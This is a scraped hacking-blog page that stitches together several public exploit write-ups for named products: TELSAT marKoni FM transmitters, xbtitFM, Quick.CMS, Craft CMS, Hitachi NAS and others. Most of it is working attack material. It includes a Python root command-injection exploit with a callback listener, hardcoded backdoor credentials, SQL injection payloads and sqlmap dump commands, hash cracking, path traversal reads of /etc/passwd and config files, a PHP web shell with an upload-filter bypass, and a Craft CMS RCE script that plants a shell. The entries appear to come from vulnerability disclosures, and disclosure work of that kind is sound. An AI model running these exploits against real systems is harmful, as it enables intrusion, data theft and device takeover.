TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control Change Password
Vendor: TELSAT Srl
Product web page: https://www.markoni.it
Affected version: Markoni-D (Compact) FM Transmitters
Markoni-DH (Exciter+Amplifiers) FM Transmitters
Markoni-A (Analogue Modulator) FM Transmitters
Firmware: 1.9.5
1.9.3
1.5.9
1.4.6
1.3.9
Summary: Professional FM transmitters.
Desc: Unauthorized user could exploit this vulnerability to change
his/her password, potentially gaining unauthorized access to sensitive
information or performing actions beyond her/his designated permissions.
Tested on: GNU/Linux 3.10.53 (armv7l)
icorem6solox
lighttpd/1.4.33
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2024-5811
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5811.php
10.11.2023
--
PoC request of a user changing his own password.
Only admin can edit users. No permissions or Cookie check.
$ curl -s -H "Cookie: name=user-1702119917" \
http://10.0.8.3:88/cgi-bin/ekafcgi.fcgi?OpCode=4&username=user&password=user&newpassword=t00tw00t
HTTP/1.1 200 OK
Content-type: text/html
Cache-control: no-cache
Set-Cookie: name=user-1702119917; max-age=315360000
Transfer-Encoding: chunked
Date: Sat, 9 Dec 2023 11:05:17 GMT
Server: lighttpd/1.4.33
oc=4&resp=0
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863104309
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: xbtitFM 4.1.18 Multiple Vulnerabilities
# Date: 22-01-2024
# Vendor Homepage: https://xbtitfm.eu
# Affected versions: 4.1.18 and prior
# Description: The SQLi and the path traversal are unauthenticated, they don't require any user interaction to be exploited and are present in the default configuration of xbtitFM.
The insecure file upload requires the file_hosting feature (hack) being enabled. If not, it can be enabled by gaining access to an administrator account.
Looking at the state and the age of the codebase there are probably more, but who cares anyway...
[Unauthenticated SQL Injection - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H]
Some examples:
Get DB name:
/shoutedit.php?action=edit&msgid=1337 AND EXTRACTVALUE(0,CONCAT(0,0,(MID((IFNULL(CAST(DATABA SE() AS NCHAR),0)),1,100))))
Get DB user:
/shoutedit.php?action=edit&msgid=1337 AND EXTRACTVALUE(0,CONCAT(0,0,(MID((IFNULL(CAST(CURREN T_USER() AS NCHAR),0)),1,100))))
Get password hash of any user (might need some modification to work on different instances):
/shoutedit.php?action=edit&msgid=1337 OR (1,1) = (SELECT COUNT(0),CONCAT((SELECT CONCAT_WS(0x3a,id,username,password,email,0x3a3a3a ) FROM xbtit_users WHERE username='admin_username_or_whatever_you_like'),FL OOR(RAND(0)*2)) FROM (information_schema.tables) GROUP BY 2);
Automate it with sqlmap to dump the database.
1) Get DB name
sqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch --current-db
2) Get table names
sqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch -D the_identified_database_name --tables
3) Dump users table (usually called xbtit_users)
sqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch -D the_identified_database_name -T xbtit_users -C id,username,email,cip,dob,password,salt,secret --dump
4) Crack hashes (usually unsalted MD5, yey!)
hashcat -m 0 xbtitfm_exported_hashes.txt wordlist.txt
Pro tip: Use All-in-One-P (https://weakpass.com/all-in-one)
[Unauthenticated Path traversal - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N]
1) Intentionally search for a file that doesn't exist to get the web application path e.g. (/home/xbtitfm/public_html/)
https[:]//example.xyz/nfo/nfogen.php?nfo=random_value_to_get_error_that_reve als_the_real_path
2) Read files that contain database credentials.
https[:]//example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/include/settings.php
https[:]//example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/include/update.php
Or any other system file you want.
https[:]//example.xyz/nfo/nfogen.php?nfo=../../../../../../../etc/passwd
3) Now who needs the SQLi to dump the DB when you have this gem? Check if the following file is configured
https[:]//example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/sxd/cfg.php
If so, go to https[:]//example.xyz/sxd (CBT Sql backup utilitiy aka Sypex-Dumper), login with the DB credentials you just found, now export the DB with on click. Nice and easy.
[Insecure file upload - Remote Code Execution (Authenticated)- CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H]
If that wasn't enough already and you want RCE, visit https[:]//example.xyz/index.php?page=file_hosting
If the file hosting feature (hack) is enabled, then simply just upload a PHP shell with the following bypass.
Changing the Content-Type of the file to image/gif and the first bytes to GIF89a; are enough to bypass the filetype checks.
A silly countermeasure against PHP files is in place so make sure you change <?php to <?pHp to bypass it.
Content-Disposition: form-data; name="file"; filename="definately_not_a_shell.php"
Content-Type: image/gif
GIF89a;
<html>
<body>
<form method="GET" name="<?pHp echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?pHp
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>
The web shell will then be uploaded here:
https[:]//example.xyz/file_hosting/definately_not_a_shell.php
If the file hosting feature is disabled, extract and crack the hash of an admin, then enable the feature from the administration panel and upload the shell.
TELSAT marKoni FM Transmitter 1.9.5 Backdoor Account
Vendor: TELSAT Srl
Product web page: https://www.markoni.it
Affected version: Markoni-D (Compact) FM Transmitters
Markoni-DH (Exciter+Amplifiers) FM Transmitters
Markoni-A (Analogue Modulator) FM Transmitters
Firmware: 1.9.5
1.9.3
1.5.9
1.4.6
1.3.9
Summary: Professional FM transmitters.
Desc: The transmitter has a hidden super administrative account 'factory'
that has the hardcoded password 'inokram25' that allows full access to
the web management interface configuration. The factory account is not
visible in the users page of the application and the password cannot be
changed through any normal operation of the device. The backdoor lies in
the /js_files/LogIn_local.js script file. Attackers could exploit this
vulnerability by logging in using the backdoor credentials for the web
panel gaining also additional functionalities including: unit configuration,
parameter modification, EEPROM overwrite, clearing DB, and factory log
modification.
Tested on: GNU/Linux 3.10.53 (armv7l)
icorem6solox
lighttpd/1.4.33
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2024-5809
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5809.php
CWE ID: 912
CWE URL: https://cwe.mitre.org/data/definitions/912.html
10.11.2023
--
The credentials can be seen in the auto_login() JS function in the
unprotected /js_files/LogIn_local.js file:
$ curl -s http://10.0.8.3:88/js_files/LogIn_local.js |grep -A2 "auto_login()"
function auto_login() { // @mod1
var username = "factory";
var password = "inokram25";
$
#!/usr/bin/env python
#
#
# TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection PoC Exploit
#
#
# Vendor: TELSAT Srl
# Product web page: https://www.markoni.it
# Affected version: Markoni-D (Compact) FM Transmitters
# Markoni-DH (Exciter+Amplifiers) FM Transmitters
# Markoni-A (Analogue Modulator) FM Transmitters
# Firmware: 1.9.5
# 1.9.3
# 1.5.9
# 1.4.6
# 1.3.9
#
# Summary: Professional FM transmitters.
#
# Desc: The marKoni FM transmitters are susceptible to unauthenticated
# remote code execution with root privileges. An attacker can exploit
# a command injection vulnerability by manipulating the Email settings'
# WAN IP info service, which utilizes the 'wget' module. This allows
# the attacker to gain unauthorized access to the system with administrative
# privileges by exploiting the 'url' parameter in the HTTP GET request
# to ekafcgi.fcgi.
#
# -------------------------------------------------------------------------
# [lqwrm@metalgear ~]# python yp.tiolpxe 10.0.8.3:88 backdoor 10.0.8.69 whoami
# Authentication successful for backdoor
# Injecting command: whoami
# Listening on port 9999
# ('10.0.8.3', 47302) called back
# Received: root
# Housekeeping...
# Zya and thanks for stopping by!
#
# [lqwrm@metalgear ~]#
#
# -------------------------------------------------------------------------
#
# Tested on: GNU/Linux 3.10.53 (armv7l)
# icorem6solox
# lighttpd/1.4.33
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2024-5808
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5808.php
#
#
# 10.11.2023
#
from colorama import init, Fore
import re,os,sys,requests
import socket,threading
from time import sleep
init()
def just_listen_to_me(lport, cstop):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", lport))
s.listen(1)
print("Listening on port " + str(lport))
try:
conn, addr = s.accept()
print(addr, "called back")
cstop.set()
except socket.timeout:
print("Call return timeout\nCheck your ports")
conn.close()
while True:
try:
odg = conn.recv(1771).decode()
uam = re.search(r"User-Agent:\s*(.*)", odg)
if uam:
uav = uam.group(1)
print(f"Received: {uav}")
exit()
else:
print("No output for you")
except:
print("Housekeeping...")
exit()
s.close()
def authenticate(ipaddr, option): #### Encrypted Shit ####_"
auth_url = f"http://{ipaddr}" # oOoOoOoOoOoOoOoOoOoOoOo"
ep = "/cgi-bin/ekafcgi.fcgi?OpCode=" ##################"
if option == "user": ##################################"
username = "\x75\x73\x65\x72" #####################"
password = "\x75\x73\x65\x72" #####################"
elif option == "admin": ###############################"
username = "\x61\x64\x6D\x69\x6E" #################"
password = "\x61\x64\x6D\x69\x6E" #################"
elif option == "backdoor": ############################"
username = "\x66\x61\x63\x74\x6F\x72\x79" #########"
password = "\x69\x6E\x6F\x6B\x72\x61\x6D\x32\x35"#_"
authp = {
'username': username,
'password': password
}
resp = requests.get(auth_url + ep + "1", params=authp)
if "Set-Cookie" in resp.headers:
print(f"Authentication successful for {option}")
auth_cookie = resp.headers["Set-Cookie"].split(";")[0]
return auth_cookie
else:
print(f"Authentication failed for {option}.")
print("Try a different option.")
return None
def execute(ipaddr, cookie, command, listen_ip):
print(f"Injecting command: {command}")
ep = "/cgi-bin/ekafcgi.fcgi?OpCode="
eden = f"http://{ipaddr}{ep}26¶m=wget&ena=1&url=-U%20%60{command}%60%20{listen_ip}:9999"
dva = f"http://{ipaddr}{ep}27"
tri = f"http://{ipaddr}{ep}26¶m=wget&ena=0&url="
clear = f"http://{ipaddr}{ep}3&com1=203C%20001001"
headers = {"Cookie": cookie}
requests.get(eden, headers=headers)
sleep(2)
requests.get(dva, headers=headers)
sleep(2)
requests.get(tri, headers=headers)
sleep(1)
requests.get(clear, headers=headers)
print("Zya and thanks for stopping by!")
exit(0)
def njaaah(text):
columns = os.get_terminal_size().columns
print(text.center(columns))
zsl = "\033[91mWaddup!\033[0m" #Win64
mrjox = f"""
________
/ \\
/ ____ \\
| / 0 \\ |
| \\______/ |
\\____________/ {zsl}
| |
/ \\
/ O \\
| O \\
| \\
| \\
|_________|
"""
if len(sys.argv) != 5:
print()
print("This is a PoC script for the marKoni transmitters 0day")
print("Usage: python yp.tiolpxe <target_ip:port> <option> <listen_ip> <command>")
print("Option: 'user', 'admin', 'backdoor'")
print("Default listening port: 9999")
njaaah(mrjox)
exit()
ipaddr = sys.argv[1]
opt = sys.argv[2]
listen_ip = sys.argv[3]
command = sys.argv[4]
opt_map = {
"admin" : "admin",
"user" : "user",
"backdoor" : "backdoor"
}
if opt in opt_map:
auth_cookie = authenticate(ipaddr, opt_map[opt])
if auth_cookie:
cstop = threading.Event()
lt = threading.Thread(target=just_listen_to_me, args=(9999, cstop))
lt.start()
execute(ipaddr, auth_cookie, command, listen_ip)
cstop.set()
lt.join()
else:
print("Invalid option.")
# Exploit Title: Quick.CMS 6.7 SQL Injection Login Bypass
# Google Dork: N/A
# Date: 02-03-2024
# Exploit Author: ./H4X.Forensics - Diyar
# Vendor Homepage: https://www.opensolution.org<https://www.opensolution.org/>
# Software Link: [https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip]
# Version: 6.7
# Tested on: Windows
# CVE : N/A
How to exploit :
*--> Open Admin Panel Through : http://127.0.0.1:8080/admin.php
*--> Enter any Email like : root@root.com<mailto:root@root.com>
*--> Enter SQL Injection Authentication Bypass Payload : ' or '1'='1
*--> Tick the Checkbox
*--> Press Login
*--> Congratz!
*--> SQL Injection Authentication Bypass Payload : ' or '1'='1
*--> Payloads Can be use :
' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
# Exploit Title: Teacher Subject Allocation Management System 1.0 - 'searchdata' SQLi
# Date: 2023-11-15
# Exploit Author: Ersin Erenler
# Vendor Homepage: https://phpgurukul.com/teacher-subject-allocation-system-using-php-and-mysql
# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=17645
# Version: 1.0
# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
# CVE : CVE-2023-46024
-------------------------------------------------------------------------------
# Description:
Teacher Subject Allocation Management System V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'searchdata' parameter in the index.php file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database.
Vulnerable File: /index.php
Parameter Name: searchdata
# Proof of Concept:
----------------------
Execute sqlmap using either the 'searchdata' parameter to retrieve the current database:
sqlmap -u "http://localhost/Tsas" --method POST --data "searchdata=test&search=" -p searchdata --risk 3 --level 3 --dbms mysql --batch --current-db
SQLMap Response:
----------------------
---
Parameter: searchdata (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: searchdata=test%' AND 3912=3912 AND 'qxHV%'='qxHV&search=
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: searchdata=test%' AND (SELECT 1043 FROM(SELECT COUNT(*),CONCAT(0x7170706a71,(SELECT (ELT(1043=1043,1))),0x717a787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'kewe%'='kewe&search=
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: searchdata=test%';SELECT SLEEP(5)#&search=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: searchdata=test%' AND (SELECT 8862 FROM (SELECT(SLEEP(5)))GqzT) AND 'wylU%'='wylU&search=
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: searchdata=test%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170706a71,0x784e7a47626a794a74456975444c5a4c64734556414658476e75684c4a716f6173724b6b6a685163,0x717a787171)-- -&search=
---
# Exploit Title: Simple Task List 1.0 - 'status' SQLi
# Date: 2023-11-15
# Exploit Author: Ersin Erenler
# Vendor Homepage: https://code-projects.org/simple-task-list-in-php-with-source-code
# Software Link: https://download-media.code-projects.org/2020/12/Simple_Task_List_In_PHP_With_Source_Code.zip
# Version: 1.0
# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
# CVE : CVE-2023-46023
-------------------------------------------------------------------------------
# Description:
Simple Task List V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'status' parameter in the addTask.php file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database.
Vulnerable File: /addTask.php
Parameter Name: status
# Proof of Concept:
----------------------
1. Register and login the system
2. Add a project and a task
3. Then use the sqlmap to exploit
4. sqlmap -u "http://localhost/Tasklist/addTask.php" --headers "Cookie: PHPSESSID=<php-cookie-value>" --method POST --data "name=test&status=N" -p status --risk 3 --level 5 --dbms mysql --batch --current-db
# SQLMap Response:
----------------------
---
Parameter: status (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: name=test&status=N'||(SELECT 0x59506356 WHERE 1189=1189 AND 7323=7323)||'
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: name=test&status=N'||(SELECT 0x6b786b49 WHERE 7851=7851 AND (SELECT 9569 FROM(SELECT COUNT(*),CONCAT(0x7171787171,(SELECT (ELT(9569=9569,1))),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: name=test&status=N'||(SELECT 0x5669775a WHERE 4483=4483 AND (SELECT 3096 FROM (SELECT(SLEEP(5)))iFlC))||'
---
# Exploit Title: Blood Bank 1.0 - 'bid' SQLi
# Date: 2023-11-15
# Exploit Author: Ersin Erenler
# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code
# Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip
# Version: 1.0
# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
# CVE : CVE-2023-46022
-------------------------------------------------------------------------------
# Description:
The 'bid' parameter in the /delete.php file of Code-Projects Blood Bank V1.0 is susceptible to Out-of-Band SQL Injection. This vulnerability stems from inadequate protection mechanisms, allowing attackers to exploit the parameter using Burp Collaborator to initiate OOB SQL injection attacks. Through this technique, an attacker can potentially extract sensitive information from the databases.
Vulnerable File: /delete.php
Parameter Name: bid
# Proof of Concept:
----------------------
1. Intercept the request to cancel.php via Burp Suite
2. Inject the payload to the vulnerable parameters
3. Payload: 3'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.collaborator-domain\\a.txt')))%2b'
4. Example request for bid parameter:
---
GET /bloodbank/file/delete.php?bid=3'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.domain.oastify.com\\a.txt')))%2b' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://localhost/bloodbank/bloodinfo.php
Cookie: PHPSESSID=<some-cookie-value>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
---
5. Database and version information is seized via Burp Suite Collaborator
# Exploit Title: Employee Management System 1.0 - 'admin_id' SQLi
# Date: 20-03-2024
# Exploit Author: Shubham Pandey
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html
# Version: 1.0
# Tested on: Windows, Linux
# CVE : CVE-2024-28595
# Description: SQL Injection vulnerability in Employee Management System v1.0 allows attackers to run arbitrary SQL commands via the admin_id parameter in update-admin.php.
# POC:
1. Here we go to : http://127.0.0.1/taskmatic/index.php
2. Now login with default Username and Password.
3. Visit the URL:
http://127.0.0.1/taskmatic/update-admin.php?admin_id=3'||(SELECT 0x697a7843
WHERE 5649=5649 AND (SELECT 2097 FROM (SELECT(SLEEP(5)))JzJH))||'
4. Page will load for 5 seconds because of time-based sql injection
# Reference:
https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-28595.md
#!/usr/bin/env python3
#coding: utf-8
# Exploit Title: Craft CMS unauthenticated Remote Code Execution (RCE)
# Date: 2023-12-26
# Version: 4.0.0-RC1 - 4.4.14
# Vendor Homepage: https://craftcms.com/
# Software Link: https://github.com/craftcms/cms/releases/tag/4.4.14
# Tested on: Ubuntu 22.04.3 LTS
# Tested on: Craft CMS 4.4.14
# Exploit Author: Olivier Lasne
# CVE : CVE-2023-41892
# References :
# https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g
# https://blog.calif.io/p/craftcms-rce
import requests
import sys, re
if(len(sys.argv) < 2):
print(f"\033[1;96mUsage:\033[0m python {sys.argv[0]} \033[1;96m<url>\033[0m")
exit()
HOST = sys.argv[1]
if not re.match('^https?://.*', HOST):
print("\033[1;31m[-]\033[0m URL should start with http or https")
exit()
print("\033[1;96m[+]\033[0m Executing phpinfo to extract some config infos")
## Execute phpinfo() and extract config info from the website
url = HOST + '/index.php'
content_type = {'Content-Type': 'application/x-www-form-urlencoded'}
data = r'action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream","__construct()":[{"close":null}],"_fn_close":"phpinfo"}}'
try:
r = requests.post(url, headers=content_type, data=data)
except:
print(f"\033[1;31m[-]\033[0m Could not connect to {HOST}")
exit()
# If we succeed, we should have default phpinfo credits
if not 'PHP Group' in r.text:
print(f'\033[1;31m[-]\033[0m {HOST} is not exploitable.')
exit()
# Extract config value for tmp_dir and document_root
pattern1 = r'<tr><td class="e">upload_tmp_dir<\/td><td class="v">(.*?)<\/td><td class="v">(.*?)<\/td><\/tr>'
pattern2 = r'<tr><td class="e">\$_SERVER\[\'DOCUMENT_ROOT\'\]<\/td><td class="v">([^<]+)<\/td><\/tr>'
tmp_dir = re.search(pattern1, r.text, re.DOTALL).group(1)
document_root = re.search(pattern2, r.text, re.DOTALL).group(1)
if 'no value' in tmp_dir:
tmp_dir = '/tmp'
print(f'temporary directory: {tmp_dir}')
print(f'web server root: {document_root}')
## Create shell.php in tmp_dir
data = {
"action": "conditions/render",
"configObject[class]": "craft\elements\conditions\ElementCondition",
"config": '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/etc/passwd"}}}'
}
files = {
"image1": ("pwn1.msl", """<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="caption:<?php @system(@$_REQUEST['cmd']); ?>"/>
<write filename="info:DOCUMENTROOT/shell.php"/>
</image>""".replace("DOCUMENTROOT", document_root), "text/plain")
}
print(f'\033[1;96m[+]\033[0m create shell.php in {tmp_dir}')
r = requests.post(url, data=data, files=files) #, proxies={'http' : 'http://127.0.0.1:8080'}) #
# Use the Imagick trick to move the webshell in DOCUMENT_ROOT
data = {
"action": "conditions/render",
"configObject[class]": r"craft\elements\conditions\ElementCondition",
"config": '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"vid:msl:' + tmp_dir + r'/php*"}}}'
}
print(f'\033[1;96m[+]\033[0m trick imagick to move shell.php in {document_root}')
r = requests.post(url, data=data) #, proxies={"http": "http://127.0.0.1:8080"})
if r.status_code != 502:
print("\033[1;31m[-]\033[0m Exploit failed")
exit()
print(f"\n\033[1;95m[+]\033[0m Webshell is deployed: {HOST}/\033[1mshell.php\033[0m?cmd=whoami")
print(f"\033[1;95m[+]\033[0m Remember to \033[1mdelete shell.php\033[0m in \033[1m{document_root}\033[0m when you're done\n")
print("\033[1;92m[!]\033[0m Enjoy your shell\n")
url = HOST + '/shell.php'
## Pseudo Shell
while True:
command = input('\033[1;96m>\033[0m ')
if command == 'exit':
exit()
if command == 'clear' or command == 'cls':
print('\n' * 100)
print('\033[H\033[3J', end='')
continue
data = {'cmd' : command}
r = requests.post(url, data=data) #, proxies={"http": "http://127.0.0.1:8080"})
# exit if we have an error
if r.status_code != 200:
print(f"Error: status code {r.status_code} for {url}")
exit()
res_command = r.text
res_command = re.sub('^caption:', '', res_command)
res_command = re.sub(' CAPTION.*$', '', res_command)
print(res_command, end='')
# Title: CSZCMS v1.3.0 - SQL Injection (Authenticated)
# Author: Abdulaziz Almetairy
# Date: 27/01/2024
# Vendor: https://www.cszcms.com/
# Software: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download
# Reference: https://github.com/oh-az
# Tested on: Windows 11, MySQL, Apache
# 1 - Log in to the admin portal
http://localhost/cszcms/admin/login
# 2 - Navigate to General Menu > Member Users.
# 3 Click the 'View' button next to any username.
# 4 Intercept the request
GET /cszcms/admin/members/view/1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: 86112035d26bb3c291899278f9ab4fb2_cszsess=n5v1jcdqfjuuo32ng66e4rttg65ugdss
Upgrade-Insecure-Requests: 1
# 5 Modify the paramter
/cszcms/admin/members/view/1
to
/cszcms/admin/members/view/'or(sleep(10))#
and url encode all characters
/cszcms/admin/members/view/%27%6f%72%28%73%6c%65%65%70%28%31%30%29%29%23%20
# Exploit Title: Hitachi NAS (HNAS) System Management Unit (SMU) 14.8.7825 - Information Disclosure
# CVE: CVE-2023-6538
# Date: 2023-12-13
# Exploit Author: Arslan Masood (@arszilla)
# Vendor: https://www.hitachivantara.com/
# Version: < 14.8.7825.01
# Tested On: 13.9.7021.04
import argparse
from os import getcwd
import requests
parser = argparse.ArgumentParser(
description="CVE-2023-6538 PoC",
usage="./CVE-2023-6538.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"
)
# Create --host argument:
parser.add_argument(
"--host",
required=True,
type=str,
help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"
)
# Create --id argument:
parser.add_argument(
"--id",
required=True,
type=str,
help="JSESSIONID cookie value"
)
# Create --sso argument:
parser.add_argument(
"--sso",
required=True,
type=str,
help="JSESSIONIDSSO cookie value"
)
# Create --id argument:
parser.add_argument(
"--id",
required=True,
type=str,
help="Server ID value"
)
args = parser.parse_args()
def download_file(hostname, jsessionid, jsessionidsso, serverid):
# Set the filename:
filename = "registry_data.tgz"
# Vulnerable SMU URL:
smu_url = f"https://{hostname}/mgr/app/template/simple%2CDownloadConfigScreen.vm?serverid={serverid}"
# GET request cookies
smu_cookies = {
"JSESSIONID": jsessionid,
"JSESSIONIDSSO": jsessionidsso
}
# GET request headers:
smu_headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Dnt": "1",
"Referer": f"https://{hostname}/mgr/app/action/serveradmin.ConfigRestoreAction/eventsubmit_doperform/ignored",
"Upgrade-Insecure-Requests": "1",
"Sec-Fetch-Dest": "document",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-User": "?1",
"Te": "trailers",
"Connection": "close"
}
# Send the request:
with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:
with open(filename, 'wb') as backup_archive:
# Write the zip file to the CWD:
backup_archive.write(file_download.content)
print(f"{filename} has been downloaded to {getcwd()}")
if __name__ == "__main__":
download_file(args.host, args.id, args.sso, args.id)
# Exploit Title: SPA-CART CMS - Stored XSS
# Date: 2024-01-03
# Exploit Author: Eren Sen
# Vendor: SPA-Cart
# Vendor Homepage: https://spa-cart.com/
# Software Link: https://demo.spa-cart.com/
# Version: [1.9.0.3]
# CVE-ID: N/A
# Tested on: Kali Linux / Windows 10
# Vulnerabilities Discovered Date : 2024/01/03
# Vulnerability Type: Stored Cross Site Scripting (XSS) Vulnerability
# Vulnerable Parameter Type: POST
# Vulnerable Parameter: descr
# Proof of Concept: demo.spa-cart.com/product/258
# HTTP Request:
POST ////admin/products/258 HTTP/2
Host: demo.spa-cart.com
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxx; remember=xxxxxxxxxxxxxxxx
Content-Length: 1906
Sec-Ch-Ua:
Accept: */*
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryUsO8JxBs6LhB8LSl
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Sec-Ch-Ua-Platform: ""
Origin: https://demo.spa-cart.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.spa-cart.com////admin/products/258
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="mode"
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="sku"
SKU386
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="name"
asdf
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="cleanurl"
Wholesale-DIY-Jewelry-Faceted-70pcs-6-8mm-Red-AB-Rondelle-glass-Crystal-Beads
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="avail"
1000
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="price"
0.00
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="list_price"
2
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="weight"
0.00
------WebKitFormBoundaryUsO8JxBs6LhB8LSl
Content-Disposition: form-data; name="categoryid"
42
